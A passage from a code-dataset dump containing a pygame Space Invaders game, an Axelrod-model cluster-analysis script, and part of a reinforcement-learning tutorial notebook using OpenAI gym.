name.upper(), True, (225, 0, 0))\r\n screen.blit(nam_e, (x, y))\r\n\r\n\r\ndef show_score(x, y):\r\n score = font.render(\"Score :\" + str(score_value), True, (0, 255, 0))\r\n screen.blit(score, (x, y))\r\n\r\n\r\ndef game_over_text():\r\n over_text = over_font.render(\"Game Over \", True, (0, 255, 0))\r\n screen.blit(over_text, (220, 220))\r\n\r\n\r\ndef high_score():\r\n high_text = high_font.render(\r\n \"Your Highscore : \" + str(score_value), True, (0, 255, 0))\r\n screen.blit(high_text, (220, 310))\r\n\r\n\r\ndef player(x, y):\r\n screen.blit(playerimg, (x, y)) # blit means draw\r\n\r\n\r\ndef enemy(x, y, i):\r\n screen.blit(enemyimg[i], (x, y))\r\n\r\n\r\ndef fire_bullet(x, y):\r\n global bullet_state\r\n bullet_state = \"fire\"\r\n screen.blit(bulletimg, (x + 15, y+17))\r\n\r\n\r\ndef isCollision(enemyX, enemyY, bulletX, bulletY):\r\n distance = math.sqrt((math.pow(enemyX - bulletX, 2)) +\r\n (math.pow(enemyY - bulletY, 2)))\r\n if distance <= 30:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n# game loop\r\nmenu = True\r\nrunning = True\r\nwhile running:\r\n while menu:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n menu = False\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n\r\n screen.fill((0, 0, 0))\r\n screen.blit(bck, (-260, 80))\r\n show_name(174, 150)\r\n pygame.display.update()\r\n\r\n # background\r\n screen.fill((0, 0, 250))\r\n screen.blit(background, (0, 0))\r\n screen.blit(wall, (0, 450))\r\n\r\n # knowing keys\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n playerX_change = -15\r\n if event.key == pygame.K_RIGHT:\r\n playerX_change = 15\r\n if event.key == pygame.K_p:\r\n menu = True\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n if event.key == pygame.K_SPACE:\r\n if bullet_state is \"ready\":\r\n # bullet sound\r\n bullet_sound = mixer.Sound('laser.mp3')\r\n bullet_sound.play()\r\n bulletX = playerX\r\n fire_bullet(playerX, bulletY)\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\r\n playerX_change = 0 # if it is not 0 then player remain moving\r\n\r\n# player movement\r\n playerX += playerX_change\r\n if playerX <= 0:\r\n playerX = 0\r\n elif playerX >= 750:\r\n playerX = 750\r\n\r\n# enemy movement\r\n for i in range(num_of_enemies):\r\n enemyX[i] += enemyX_change[i]\r\n if enemyX[i] <= 0:\r\n enemyX_change[i] = 5\r\n enemyY[i] += enemyY_change[i]\r\n elif enemyX[i] >= 700:\r\n enemyX_change[i] = -5\r\n enemyY[i] += enemyY_change[i]\r\n # game over\r\n if enemyY[i] > 390:\r\n for j in range(num_of_enemies):\r\n enemyY[j] = 2000\r\n game_over_text()\r\n high_score()\r\n\r\n continue\r\n pygame.display.update()\r\n\r\n\r\n# collision\r\n collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n if collision:\r\n bomb_sound = mixer.Sound('bomb.mp3')\r\n bomb_sound.play()\r\n bulletY = 510\r\n bullet_state = \"ready\"\r\n score_value += 1\r\n enemyX[i] = random.randint(0, 730)\r\n enemyY[i] = random.randint(0, 50)\r\n\r\n enemy(enemyX[i], enemyY[i], i)\r\n # bullet movement\r\n if bulletY <= 0:\r\n bulletY = 510\r\n bullet_state = \"ready\"\r\n if bullet_state is \"fire\":\r\n fire_bullet(bulletX, bulletY)\r\n bulletY -= bulletY_change\r\n\r\n player(playerX, playerY)\r\n show_score(textX, textY)\r\n pygame.display.update()\r\n","repo_name":"Raghvendra-user/Space-Invaders","sub_path":"Space Invaders.py","file_name":"Space Invaders.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29140665753","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 12 23:53:23 2022\r\n\r\n@author: nkyos\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport pickle as pkl\r\nfrom numba import njit\r\nfrom scipy.ndimage import measurements as meas\r\nimport os\r\nimport re\r\nimport matplotlib.pyplot as plt\r\n\r\n#Returns a colored grid\r\ndef color(dim, data, L, imageName, save=False):\r\n \r\n # turn feature arrays to single values\r\n Matrix = njit_labelGrid(dim, data, L)\r\n FlippedMatrix = np.flip(Matrix, 0)\r\n \r\n # plot\r\n fig, ax = plt.subplots() # delte after\r\n xi = np.arange(0, dim+1)\r\n yi = np.arange(0, dim+1)\r\n X, Y = np.meshgrid(xi, yi)\r\n ax.pcolormesh(X, Y, FlippedMatrix)\r\n # plt.pcolormesh(FlippedMatrix, edgecolors=\"w\")\r\n ax.set_aspect('equal')\r\n plt.axis('off')\r\n # plt.title('Stable State of Social Influence Model')\r\n if save:\r\n plt.savefig(imageName)\r\n plt.close()\r\n \r\n\r\n@njit\r\ndef njit_labelGrid(dim, data, L):\r\n \r\n Matrix = np.zeros((dim, dim), dtype = np.uint32)\r\n labels = np.arange(1, Matrix.size + 1)\r\n np.random.shuffle(labels)\r\n \r\n for row in range (0,dim):\r\n for col in range(0,dim):\r\n if row == 0 and col == 0:\r\n stableRegions = data[row,col].copy().reshape(1, -1)\r\n else:\r\n arr_in_regions = False\r\n for r in range(stableRegions.shape[0]):\r\n elems_same = 0\r\n for feat in range(stableRegions[r,:].size):\r\n if data[row,col,feat] == stableRegions[r, feat]:\r\n elems_same += 1\r\n if elems_same == L:\r\n arr_in_regions = True\r\n if ~arr_in_regions:\r\n stableRegions = np.concatenate((stableRegions, data[row, col].reshape(1, -1)))\r\n \r\n for row in range (0, dim):\r\n for col in range(0, dim):\r\n for r in range(stableRegions.shape[0]):\r\n elems_same = 0\r\n for feat in range(stableRegions[r,:].size):\r\n if data[row,col,feat] == stableRegions[r, feat]:\r\n elems_same += 1\r\n if elems_same == L:\r\n Matrix[row,col] = labels[r]\r\n \r\n return Matrix\r\n\r\n\r\ndef analyzeClusters(dim, data, L):\r\n '''\r\n returns the biggest cluster size (normalised) and the number of clusters\r\n '''\r\n\r\n \r\n # turn feature arrays to single values\r\n Matrix = njit_labelGrid(dim, data, L)\r\n \r\n # get number of clusters\r\n labels = np.unique(Matrix)\r\n num_clusters = len(labels)\r\n \r\n # get cluster sizes \r\n clusters_sizes = np.zeros(len(labels), dtype = np.uint32)\r\n \r\n for ilab, lab in enumerate(labels):\r\n z = (Matrix == lab)\r\n lw, _ = meas.label(z) \r\n area = meas.sum(z, lw, index=np.arange(lw.max() + 1))\r\n clusters_sizes[ilab] = np.max(area)\r\n \r\n # get top 1 cluster size\r\n # N = dim**2\r\n # norm_clusters_sizes = [i / N for i in clusters_sizes] # normalise sizes\r\n # g = np.sort(norm_clusters_sizes)[::-1][0] \r\n \r\n g = np.sort(clusters_sizes)[::-1][0] # normalise after you average!\r\n \r\n return g, num_clusters\r\n \r\n\r\n# -- 1 \r\n \r\n\r\nfolder = 'Part 1 Results - Runs No3' \r\nsubfolder = '5F50dim1media0.0005B'\r\npath = os.path.join(folder, subfolder)\r\n\r\nL = int(re.search('(.*)F', subfolder).group(1))\r\ndim = int(re.search('F(.*)dim', subfolder).group(1))\r\nN = dim*dim\r\nmedia = int(re.search('dim(.*)media', subfolder).group(1))\r\nB = float(re.search('a(.*)B', subfolder).group(1))\r\nTs = [2,5,10,15,20,25,30,35,40,45,50]\r\n\r\n\r\nresults = np.zeros((len(Ts), 2)) \r\n\r\nfor iT, T in enumerate(Ts):\r\n \r\n num_files = 0\r\n avg_sg = 0\r\n for folder in os.listdir(path):\r\n sub_path = os.path.join(path, folder)\r\n if os.path.isdir(sub_path): \r\n for file in os.listdir(sub_path):\r\n if (('finalMap' in file) and ('.pkl' in file)):\r\n if T == int(re.search('F(.*)Q', file).group(1)):\r\n \r\n print(file)\r\n num_files += 1\r\n # T = int(re.search('F(.*)Q', file).group(1))\r\n \r\n filepath = os.path.join(sub_path, file)\r\n with open(filepath, 'rb') as f:\r\n mat = pkl.load(f)\r\n \r\n _, ng = analyzeClusters(dim, mat, L)\r\n \r\n imagePath = os.path.join(sub_path, file[:-4].replace('.',','))\r\n # color(dim, mat, L, imagePath, save=True)\r\n \r\n avg_sg += ng\r\n \r\n mean_q = (avg_sg/num_files) / N if num_files > 0 else 0 \r\n results[iT, :] = [T, mean_q] \r\n \r\n \r\n# ----- 2/3/4\r\n\r\n\r\nfolder = 'Part 1 Results - Runs No3' \r\n# subfolder = '5F50dim2media0.0005B' # missing 5 :(\r\n# subfolder = '5F50dim1media0.6B' # missing one\r\n# subfolder = '5F50dim2media0.1B' # not missing any\r\npath = os.path.join(folder, subfolder)\r\n\r\nL = int(re.search('(.*)F', subfolder).group(1))\r\ndim = int(re.search('F(.*)dim', subfolder).group(1))\r\nN = dim*dim\r\nmedia = int(re.search('dim(.*)media', subfolder).group(1))\r\nB = float(re.search('a(.*)B', subfolder).group(1))\r\nTs = [2,5,10,15,20,25,30,35,40,45,50]\r\n\r\n\r\nresults = np.zeros((len(Ts), 2)) \r\n\r\nfor iT, T in enumerate(Ts):\r\n \r\n num_files = 0\r\n avg_sg = 0\r\n for folder in os.listdir(path):\r\n sub_path = os.path.join(path, folder)\r\n if os.path.isdir(sub_path): \r\n for file in os.listdir(sub_path):\r\n if (('finalMap' in file) and ('.pkl' in file)):\r\n if T == int(re.search('F(.*)Q', file).group(1)):\r\n \r\n print(file)\r\n num_files += 1\r\n # T = int(re.search('F(.*)Q', file).group(1))\r\n \r\n filepath = os.path.join(sub_path, file)\r\n with open(filepath, 'rb') as f:\r\n mat = pkl.load(f)\r\n \r\n _, ng = analyzeClusters(dim, mat, L)\r\n \r\n imagePath = os.path.join(sub_path, file[:-4].replace('.',','))\r\n # color(dim, mat, L, imagePath, save=True)\r\n \r\n avg_sg += ng\r\n \r\n mean_q = (avg_sg/num_files) / N if num_files > 0 else 0 \r\n results[iT, :] = [T, mean_q] \r\n \r\n \r\n# ------ plot g vs q\r\n\r\n\r\nfigname = path + '.png'\r\nfigpath = os.path.join(path, figname)\r\nfig, ax1 = plt.subplots()\r\n\r\ncolor1 = 'black'\r\nlab1 = r'$\\langle S_{max} \\rangle / N $'\r\nax1.plot(results[:,0], results[:,1], marker = 'o', color=color1)\r\n\r\nax1.set_xlabel(r'$q$')\r\nax1.set_ylabel(lab1)\r\n# ax1.tick_params(axis='y')\r\n\r\nfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n# plt.savefig(figpath, dpi=400)\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"nicoleta-kyo/Axelrod-Model-Mass-Media","sub_path":"code/make_color_graph_gvsq_ALL.py","file_name":"make_color_graph_gvsq_ALL.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43891259321","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# **Chapter 18 – Reinforcement Learning**\n\n# _This notebook contains all the sample code in chapter 18_.\n\n# \n# \n#
    \n# Run in Google Colab\n#
    \n\n# # Setup\n\n# First, let's import a few common modules, ensure MatplotLib plots figures inline and prepare a function to save the figures. We also check that Python 3.5 or later is installed (although Python 2.x may work, it is deprecated so we strongly recommend you use Python 3 instead), as well as Scikit-Learn ≥0.20 and TensorFlow ≥2.0.\n\n# In[1]:\n\n\n# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\ntry:\n # %tensorflow_version only exists in Colab.\n get_ipython().run_line_magic('tensorflow_version', '2.x')\n get_ipython().system('apt update && apt install -y libpq-dev libsdl2-dev swig xorg-dev xvfb')\n get_ipython().system('pip install -q -U tf-agents-nightly pyvirtualdisplay gym[atari]')\n IS_COLAB = True\nexcept Exception:\n IS_COLAB = False\n\n# TensorFlow ≥2.0 is required\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\nif not tf.test.is_gpu_available():\n print(\"No GPU was detected. CNNs can be very slow without a GPU.\")\n if IS_COLAB:\n print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n\n# Common imports\nimport numpy as np\nimport os\n\n# to make this notebook's output stable across runs\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# To plot pretty figures\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# To get smooth animations\nimport matplotlib.animation as animation\nmpl.rc('animation', html='jshtml')\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"rl\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\n# # Introduction to OpenAI gym\n\n# In this notebook we will be using [OpenAI gym](https://gym.openai.com/), a great toolkit for developing and comparing Reinforcement Learning algorithms. It provides many environments for your learning *agents* to interact with. Let's start by importing `gym`:\n\n# In[2]:\n\n\nimport gym\n\n\n# Let's list all the available environments:\n\n# In[3]:\n\n\ngym.envs.registry.all()\n\n\n# The Cart-Pole is a very simple environment composed of a cart that can move left or right, and pole placed vertically on top of it. The agent must move the cart left or right to keep the pole upright.\n\n# In[4]:\n\n\nenv = gym.make('CartPole-v1')\n\n\n# Let's initialize the environment by calling is `reset()` method. This returns an observation:\n\n# In[5]:\n\n\nenv.seed(42)\nobs = env.reset()\n\n\n# Observations vary depending on the environment. In this case it is a 1D NumPy array composed of 4 floats: they represent the cart's horizontal position, its velocity, the angle of the pole (0 = vertical), and the angular velocity.\n\n# In[6]:\n\n\nobs\n\n\n# An environment can be visualized by calling its `render()` method, and you can pick the rendering mode (the rendering options depend on the environment).\n\n# **Warning**: some environments (including the Cart-Pole) require access to your display, which opens up a separate window, even if you specify `mode=\"rgb_array\"`. In general you can safely ignore that window. However, if Jupyter is running on a headless server (ie. without a screen) it will raise an exception. One way to avoid this is to install a fake X server like [Xvfb](http://en.wikipedia.org/wiki/Xvfb). On Debian or Ubuntu:\n# \n# ```bash\n# $ apt update\n# $ apt install -y xvfb\n# ```\n# \n# You can then start Jupyter using the `xvfb-run` command:\n# \n# ```bash\n# $ xvfb-run -s \"-screen 0 1400x900x24\" jupyter notebook\n# ```\n# \n# Alternatively, you can install the [pyvirtualdisplay](https://github.com/ponty/pyvirtualdisplay) Python library which wraps Xvfb:\n# \n# ```bash\n# python3 -m pip install -U pyvirtualdisplay\n# ```\n# \n# And run the following code:\n\n# In[7]:\n\n\ntry:\n import pyvirtualdisplay\n display = pyvirtualdisplay.Display(visible=0, size=(1400, 900)).start()\nexcept ImportError:\n pass\n\n\n# In[8]:\n\n\nenv.render()\n\n\n# In this example we will set `mode=\"rgb_array\"` to get an image of the environment as a NumPy array:\n\n# In[9]:\n\n\nimg = env.render(mode=\"rgb_array\")\nimg.shape\n\n\n# In[10]:\n\n\ndef plot_environment(env, figsize=(5,4)):\n plt.figure(figsize=figsize)\n img = env.render(mode=\"rgb_array\")\n plt.imshow(img)\n plt.axis(\"off\")\n return img\n\n\n# In[11]:\n\n\nplot_environment(env)\nplt.show()\n\n\n# Let's see how to interact with an environment. Your agent will need to select an action from an \"action space\" (the set of possible actions). Let's see what this environment's action space looks like:\n\n# In[12]:\n\n\nenv.action_space\n\n\n# Yep, just two possible actions: accelerate towards the left or towards the right.\n\n# Since the pole is leaning toward the right (`obs[2] > 0`), let's accelerate the cart toward the right:\n\n# In[13]:\n\n\naction = 1 # accelerate right\nobs, reward, done, info = env.step(action)\nobs\n\n\n# Notice that the cart is now moving toward the right (`obs[1] > 0`). The pole is still tilted toward the right (`obs[2] > 0`), but its angular velocity is now negative (`obs[3] < 0`), so it will likely be tilted toward the left after the next step.\n\n# In[14]:\n\n\nplot_environment(env)\nsave_fig(\"cart_pole_plot\")\n\n\n# Looks like it's doing what we're telling it to do!\n\n# The environment also tells the agent how much reward it got during the last step:\n\n# In[15]:\n\n\nreward\n\n\n# When the game is over, the environment returns `done=True`:\n\n# In[16]:\n\n\ndone\n\n\n# Finally, `info` is an environment-specific dictionary that can provide some extra information that you may find useful for debugging or for training. For example, in some games it may indicate how many lives the agent has.\n\n# In[17]:\n\n\ninfo\n\n\n# The sequence of steps between the moment the environment is reset until it is done is called an \"episode\". At the end of an episode (i.e., when `step()` returns `done=True`), you should reset the environment before you continue to use it.\n\n# In[18]:\n\n\nif done:\n obs = env.reset()\n\n\n# Now how can we make the poll remain upright? We will need to define a _policy_ for that. This is the strategy that the agent will use to select an action at each step. It can use all the past actions and observations to decide what to do.\n\n# # A simple hard-coded policy\n\n# Let's hard code a simple strategy: if the pole is tilting to the left, then push the cart to the left, and _vice versa_. Let's see if that works:\n\n# In[19]:\n\n\nenv.seed(42)\n\ndef basic_policy(obs):\n angle = obs[2]\n return 0 if angle < 0 else 1\n\ntotals = []\nfor episode in range(500):\n episode_rewards = 0\n obs = env.reset()\n for step in range(200):\n action = basic_policy(obs)\n obs, reward, done, info = env.step(action)\n episode_rewards += reward\n if done:\n break\n totals.append(episode_rewards)\n\n\n# In[20]:\n\n\nnp.mean(totals), np.std(totals), np.min(totals), np.max(totals)\n\n\n# Well, as expected, this strategy is a bit too basic: the best it did was to keep the poll up for only 68 steps. This environment is considered solved when the agent keeps the poll up for 200 steps.\n\n# Let's visualize one episode:\n\n# In[21]:\n\n\nenv.seed(42)\n\nframes = []\n\nobs = env.reset()\nfor step in range(200):\n img = env.render(mode=\"rgb_array\")\n frames.append(img)\n action = basic_policy(obs)\n\n obs, reward, done, info = env.step(action)\n if done:\n break\n\n\n# Now show the animation:\n\n# In[22]:\n\n\ndef update_scene(num, frames, patch):\n patch.set_data(frames[num])\n return patch,\n\ndef plot_animation(frames, repeat=False, interval=40):\n fig = plt.figure()\n patch = plt.imshow(frames[0])\n plt.axis('off')\n anim = animation.FuncAnimation(\n fig, update_scene, fargs=(frames, patch),\n frames=len(frames), repeat=repeat, interval=interval)\n plt.close()\n return anim\n\n\n# In[23]:\n\n\nplot_animation(frames)\n\n\n# Clearly the system is unstable and after just a few wobbles, the pole ends up too tilted: game over. We will need to be smarter than that!\n\n# # Neural Network Policies\n\n# Let's create a neural network that will take observations as inputs, and output the action to take for each observation. To choose an action, the network will estimate a probability for each action, then we will select an action randomly according to the estimated probabilities. In the case of the Cart-Pole environment, there are just two possible actions (left or right), so we only need one output neuron: it will output the probability `p` of the action 0 (left), and of course the probability of action 1 (right) will be `1 - p`.\n\n# In[24]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nn_inputs = 4 # == env.observation_space.shape[0]\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(5, activation=\"elu\", input_shape=[n_inputs]),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n])\n\n\n# In this particular environment, the past actions and observations can safely be ignored, since each observation contains the environment's full state. If there were some hidden state then you may need to consider past actions and observations in order to try to infer the hidden state of the environment. For example, if the environment only revealed the position of the cart but not its velocity, you would have to consider not only the current observation but also the previous observation in order to estimate the current velocity. Another example is if the observations are noisy: you may want to use the past few observations to estimate the most likely current state. Our problem is thus as simple as can be: the current observation is noise-free and contains the environment's full state.\n\n# You may wonder why we plan to pick a random action based on the probability given by the policy network, rather than just picking the action with the highest probability. This approach lets the agent find the right balance between _exploring_ new actions and _exploiting_ the actions that are known to work well. Here's an analogy: suppose you go to a restaurant for the first time, and all the dishes look equally appealing so you randomly pick one. If it turns out to be good, you can increase the probability to order it next time, but you shouldn't increase that probability to 100%, or else you will never try out the other dishes, some of which may be even better than the one you tried.\n\n# Let's write a small function that will run the model to play one episode, and return the frames so we can display an animation:\n\n# In[25]:\n\n\ndef render_policy_net(model, n_max_steps=200, seed=42):\n frames = []\n env = gym.make(\"CartPole-v1\")\n env.seed(seed)\n np.random.seed(seed)\n obs = env.reset()\n for step in range(n_max_steps):\n frames.append(env.render(mode=\"rgb_array\"))\n left_proba = model.predict(obs.reshape(1, -1))\n action = int(np.random.rand() > left_proba)\n obs, reward, done, info = env.step(action)\n if done:\n break\n env.close()\n return frames\n\n\n# Now let's look at how well this randomly initialized policy network performs:\n\n# In[26]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# Yeah... pretty bad. The neural network will have to learn to do better. First let's see if it is capable of learning the basic policy we used earlier: go left if the pole is tilting left, and go right if it is tilting right.\n\n# We can make the same net play in 50 different environments in parallel (this will give us a diverse training batch at each step), and train for 5000 iterations. We also reset environments when they are done. We train the model using a custom training loop so we can easily use the predictions at each training step to advance the environments.\n\n# In[27]:\n\n\nn_environments = 50\nn_iterations = 5000\n\nenvs = [gym.make(\"CartPole-v1\") for _ in range(n_environments)]\nfor index, env in enumerate(envs):\n env.seed(index)\nnp.random.seed(42)\nobservations = [env.reset() for env in envs]\noptimizer = keras.optimizers.RMSprop()\nloss_fn = keras.losses.binary_crossentropy\n\nfor iteration in range(n_iterations):\n # if angle < 0, we want proba(left) = 1., or else proba(left) = 0.\n target_probas = np.array([([1.] if obs[2] < 0 else [0.])\n for obs in observations])\n with tf.GradientTape() as tape:\n left_probas = model(np.array(observations))\n loss = tf.reduce_mean(loss_fn(target_probas, left_probas))\n print(\"\\rIteration: {}, Loss: {:.3f}\".format(iteration, loss.numpy()), end=\"\")\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n actions = (np.random.rand(n_environments, 1) > left_probas.numpy()).astype(np.int32)\n for env_index, env in enumerate(envs):\n obs, reward, done, info = env.step(actions[env_index][0])\n observations[env_index] = obs if not done else env.reset()\n\nfor env in envs:\n env.close()\n\n\n# In[28]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# Looks like it learned the policy correctly. Now let's see if it can learn a better policy on its own. One that does not wobble as much.\n\n# # Policy Gradients\n\n# To train this neural network we will need to define the target probabilities `y`. If an action is good we should increase its probability, and conversely if it is bad we should reduce it. But how do we know whether an action is good or bad? The problem is that most actions have delayed effects, so when you win or lose points in an episode, it is not clear which actions contributed to this result: was it just the last action? Or the last 10? Or just one action 50 steps earlier? This is called the _credit assignment problem_.\n# \n# The _Policy Gradients_ algorithm tackles this problem by first playing multiple episodes, then making the actions in good episodes slightly more likely, while actions in bad episodes are made slightly less likely. First we play, then we go back and think about what we did.\n\n# Let's start by creating a function to play a single step using the model. We will also pretend for now that whatever action it takes is the right one, so we can compute the loss and its gradients (we will just save these gradients for now, and modify them later depending on how good or bad the action turned out to be):\n\n# In[29]:\n\n\ndef play_one_step(env, obs, model, loss_fn):\n with tf.GradientTape() as tape:\n left_proba = model(obs[np.newaxis])\n action = (tf.random.uniform([1, 1]) > left_proba)\n y_target = tf.constant([[1.]]) - tf.cast(action, tf.float32)\n loss = tf.reduce_mean(loss_fn(y_target, left_proba))\n grads = tape.gradient(loss, model.trainable_variables)\n obs, reward, done, info = env.step(int(action[0, 0].numpy()))\n return obs, reward, done, grads\n\n\n# If `left_proba` is high, then `action` will most likely be `False` (since a random number uniformally sampled between 0 and 1 will probably not be greater than `left_proba`). And `False` means 0 when you cast it to a number, so `y_target` would be equal to 1 - 0 = 1. In other words, we set the target to 1, meaning we pretend that the probability of going left should have been 100% (so we took the right action).\n\n# Now let's create another function that will rely on the `play_one_step()` function to play multiple episodes, returning all the rewards and gradients, for each episode and each step:\n\n# In[30]:\n\n\ndef play_multiple_episodes(env, n_episodes, n_max_steps, model, loss_fn):\n all_rewards = []\n all_grads = []\n for episode in range(n_episodes):\n current_rewards = []\n current_grads = []\n obs = env.reset()\n for step in range(n_max_steps):\n obs, reward, done, grads = play_one_step(env, obs, model, loss_fn)\n current_rewards.append(reward)\n current_grads.append(grads)\n if done:\n break\n all_rewards.append(current_rewards)\n all_grads.append(current_grads)\n return all_rewards, all_grads\n\n\n# The Policy Gradients algorithm uses the model to play the episode several times (e.g., 10 times), then it goes back and looks at all the rewards, discounts them and normalizes them. So let's create couple functions for that: the first will compute discounted rewards; the second will normalize the discounted rewards across many episodes.\n\n# In[31]:\n\n\ndef discount_rewards(rewards, discount_rate):\n discounted = np.array(rewards)\n for step in range(len(rewards) - 2, -1, -1):\n discounted[step] += discounted[step + 1] * discount_rate\n return discounted\n\ndef discount_and_normalize_rewards(all_rewards, discount_rate):\n all_discounted_rewards = [discount_rewards(rewards, discount_rate)\n for rewards in all_rewards]\n flat_rewards = np.concatenate(all_discounted_rewards)\n reward_mean = flat_rewards.mean()\n reward_std = flat_rewards.std()\n return [(discounted_rewards - reward_mean) / reward_std\n for discounted_rewards in all_discounted_rewards]\n\n\n# Say there were 3 actions, and after each action there was a reward: first 10, then 0, then -50. If we use a discount factor of 80%, then the 3rd action will get -50 (full credit for the last reward), but the 2nd action will only get -40 (80% credit for the last reward), and the 1st action will get 80% of -40 (-32) plus full credit for the first reward (+10), which leads to a discounted reward of -22:\n\n# In[32]:\n\n\ndiscount_rewards([10, 0, -50], discount_rate=0.8)\n\n\n# To normalize all discounted rewards across all episodes, we compute the mean and standard deviation of all the discounted rewards, and we subtract the mean from each discounted reward, and divide by the standard deviation:\n\n# In[33]:\n\n\ndiscount_and_normalize_rewards([[10, 0, -50], [10, 20]], discount_rate=0.8)\n\n\n# In[34]:\n\n\nn_iterations = 150\nn_episodes_per_update = 10\nn_max_steps = 200\ndiscount_rate = 0.95\n\n\n# In[35]:\n\n\noptimizer = keras.optimizers.Adam(lr=0.01)\nloss_fn = keras.losses.binary_crossentropy\n\n\n# In[36]:\n\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(5, activation=\"elu\", input_shape=[4]),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n])\n\n\n# In[37]:\n\n\nenv = gym.make(\"CartPole-v1\")\nenv.seed(42);\n\nfor iteration in range(n_iterations):\n all_rewards, all_grads = play_multiple_episodes(\n env, n_episodes_per_update, n_max_steps, model, loss_fn)\n total_rewards = sum(map(sum, all_rewards)) # Not shown in the book\n print(\"\\rIteration: {}, mean rewards: {:.1f}\".format( # Not shown\n iteration, total_rewards / n_episodes_per_update), end=\"\") # Not shown\n all_final_rewards = discount_and_normalize_rewards(all_rewards,\n discount_rate)\n all_mean_grads = []\n for var_index in range(len(model.trainable_variables)):\n mean_grads = tf.reduce_mean(\n [final_reward * all_grads[episode_index][step][var_index]\n for episode_index, final_rewards in enumerate(all_final_rewards)\n for step, final_reward in enumerate(final_rewards)], axis=0)\n all_mean_grads.append(mean_grads)\n optimizer.apply_gradients(zip(all_mean_grads, model.trainable_variables))\n\nenv.close()\n\n\n# In[38]:\n\n\nframes = render_policy_net(model)\nplot_animation(frames)\n\n\n# # Markov Chains\n\n# In[39]:\n\n\nnp.random.seed(42)\n\ntransition_probabilities = [ # shape=[s, s']\n [0.7, 0.2, 0.0, 0.1], # from s0 to s0, s1, s2, s3\n [0.0, 0.0, 0.9, 0.1], # from s1 to ...\n [0.0, 1.0, 0.0, 0.0], # from s2 to ...\n [0.0, 0.0, 0.0, 1.0]] # from s3 to ...\n\nn_max_steps = 50\n\ndef print_sequence():\n current_state = 0\n print(\"States:\", end=\" \")\n for step in range(n_max_steps):\n print(current_state, end=\" \")\n if current_state == 3:\n break\n current_state = np.random.choice(range(4), p=transition_probabilities[current_state])\n else:\n print(\"...\", end=\"\")\n print()\n\nfor _ in range(10):\n print_sequence()\n\n\n# # Markov Decision Process\n\n# Let's define some transition probabilities, rewards and possible actions. For example, in state s0, if action a0 is chosen then with proba 0.7 we will go to state s0 with reward +10, with probability 0.3 we will go to state s1 with no reward, and with never go to state s2 (so the transition probabilities are `[0.7, 0.3, 0.0]`, and the rewards are `[+10, 0, 0]`):\n\n# In[40]:\n\n\ntransition_probabilities = [ # shape=[s, a, s']\n [[0.7, 0.3, 0.0], [1.0, 0.0, 0.0], [0.8, 0.2, 0.0]],\n [[0.0, 1.0, 0.0], None, [0.0, 0.0, 1.0]],\n [None, [0.8, 0.1, 0.1], None]]\nrewards = [ # shape=[s, a, s']\n [[+10, 0, 0], [0, 0, 0], [0, 0, 0]],\n [[0, 0, 0], [0, 0, 0], [0, 0, -50]],\n [[0, 0, 0], [+40, 0, 0], [0, 0, 0]]]\npossible_actions = [[0, 1, 2], [0, 2], [1]]\n\n\n# # Q-Value Iteration\n\n# In[41]:\n\n\nQ_values = np.full((3, 3), -np.inf) # -np.inf for impossible actions\nfor state, actions in enumerate(possible_actions):\n Q_values[state, actions] = 0.0 # for all possible actions\n\n\n# In[42]:\n\n\ngamma = 0.90 # the discount factor\n\nhistory1 = [] # Not shown in the book (for the figure below)\nfor iteration in range(50):\n Q_prev = Q_values.copy()\n history1.append(Q_prev) # Not shown\n for s in range(3):\n for a in possible_actions[s]:\n Q_values[s, a] = np.sum([\n transition_probabilities[s][a][sp]\n * (rewards[s][a][sp] + gamma * np.max(Q_prev[sp]))\n for sp in 